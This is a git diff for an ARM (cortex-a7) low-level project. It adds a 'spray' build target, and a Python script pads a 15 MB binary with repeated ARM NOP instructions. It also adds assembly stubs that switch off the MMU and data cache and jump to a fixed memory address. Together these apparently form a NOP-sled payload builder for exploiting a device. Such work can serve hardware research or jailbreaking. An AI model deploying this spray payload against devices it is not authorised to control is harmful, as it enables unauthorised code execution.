diff --git a/x1/Makefile b/x1/Makefile
index 792b07d..c51b080 100644
--- a/x1/Makefile
+++ b/x1/Makefile
@@ -7,7 +7,7 @@ all: return.bin mrc.bin c/main.bin
 
 .PHONY:
 clean:
-	@rm -f *.bin */*.bin
+	@rm -f *.bin spray/*.bin c/*.bin
 
 %.bin: %.S
 	@$(AS) $<
@@ -17,4 +17,12 @@ clean:
 c/main.bin:
 	@$(CC) -nostdlib -static -fPIC -mcpu=cortex-a7 c/start.S c/main.c
 	@./extract.py a.out $@
-	#@rm -f a.out
+	@rm -f a.out
+
+spray/main.bin:
+	@$(AS) spray/top.S
+	@./extract.py -p a.out spray/top.bin
+	@$(AS) spray/bottom.S
+	@./extract.py -p a.out spray/bottom.bin
+	@./append_nop.py 15728640 spray/top.bin spray/bottom.bin spray/main.bin
+	@rm -f a.out
diff --git a/x1/append_nop.py b/x1/append_nop.py
new file mode 100755
index 0000000..bdfa73e
--- /dev/null
+++ b/x1/append_nop.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+
+import sys
+
+
+def main():
+    if len(sys.argv) < 5:
+        print(f'Usage: {sys.argv[0]} N top.bin bottom.bin out.bin', file=sys.stderr)
+        sys.exit(1)
+
+    with open(sys.argv[2], 'rb') as topf, open(sys.argv[3], 'rb') as bottomf, open(sys.argv[4], 'wb') as out:
+        top, bottom = topf.read(), bottomf.read()
+        out.write(top)
+        for i in range((1024 * 64 - len(top) - len(bottom)) // 4):
+            out.write(b'\x00\x00\xa0\xe1')
+        out.write(bottom)
+
+        for i in range(1024 * 1024 * 15 // (1024 * 64) - 1):
+            for i in range((1024 * 64 - len(bottom)) // 4):
+                out.write(b'\x00\x00\xa0\xe1')
+            out.write(bottom)
+
+
+main()
diff --git a/x1/extract.py b/x1/extract.py
index b6b3d27..8432ceb 100755
--- a/x1/extract.py
+++ b/x1/extract.py
@@ -9,7 +9,7 @@ def main():
         print(f'Usage: {sys.argv[0]} in.elf out.bin')
         sys.exit(1)
 
-    with open(sys.argv[1], 'rb') as f:
+    with open(sys.argv[-2], 'rb') as f:
         extract(ELFFile(f))
 
 
@@ -19,10 +19,14 @@ def extract(elf):
         print('Input ELF has no .text section', file=sys.stderr)
         sys.exit(1)
 
-    with open(sys.argv[2], 'wb') as f:
-        elf.stream.seek(0)
-        elf.stream.read(text.header.sh_offset)
-        f.write(elf.stream.read())
+    with open(sys.argv[-1], 'wb') as f:
+        if '-p' in sys.argv:
+            print(f'Pure .text mode is enabled')
+            f.write(text.data())
+        else:
+            elf.stream.seek(0)
+            elf.stream.read(text.header.sh_offset)
+            f.write(elf.stream.read())
 
     print(f'Successfully extracted the necessary sections to "{sys.argv[2]}"')
 
diff --git a/x1/spray/bottom.S b/x1/spray/bottom.S
new file mode 100644
index 0000000..ac76cb4
--- /dev/null
+++ b/x1/spray/bottom.S
@@ -0,0 +1,9 @@
+.text
+    .align 2
+    .global _start
+
+_start:
+loop:
+    b loop
+    ldr r0, =0x00000000
+    mov pc, r0
diff --git a/x1/spray/top.S b/x1/spray/top.S
new file mode 100644
index 0000000..9efdb23
--- /dev/null
+++ b/x1/spray/top.S
@@ -0,0 +1,16 @@
+.text
+    .align 2
+    .global _start
+
+_start:
+    mov r9, #0
+    ldr r0, =0x67800000
+
+    mrc p15, 0, r10, c1, c0, 0
+    bic r10, r10, #1  @ disable MMU and dcache
+    @bic r10, r10, #4096  @ disable icache
+    mcr p15, 0, r10, c1, c0, 0 // write ctrl regs
+    #mcr p15, 0, r9, c7, c7, 0 // invalidate cache
+    #mcr p15, 0, r9, c8, c7, 0 // invalidate TLB
+    mov pc, r0
+